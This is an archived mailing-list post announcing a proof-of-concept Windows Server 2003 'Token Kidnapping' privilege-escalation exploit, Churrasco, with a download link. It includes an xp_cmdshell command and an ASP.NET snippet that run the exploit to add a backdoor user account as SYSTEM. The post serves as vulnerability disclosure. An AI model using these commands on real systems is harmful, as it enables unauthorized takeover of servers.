<<< Date Index >>>     <<< Thread Index >>>

Token Kidnapping Windows 2003 PoC exploit



(From 
http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since Token Kidnapping presentation 
(http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I 
decided to release a PoC exploit for Win2k3 that alows to execute code under 
SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own 
Windows, this is because Windows services accounts can impersonate.
Other process (not services) that can impersonate are IIS 6 worker processes so 
if you can run code from an ASP .NET or classic ASP web application then you 
can own Windows too. If you provide shared hosting services then I would 
recomend to not allow users to run this kind of code from ASP.


-SQL Server is a nice target for the exploit if you are a DBA and want to own 
Windows:

exec xp_cmdshell 'churrasco "net user /add hacker"'


-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...


You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.

Cesar.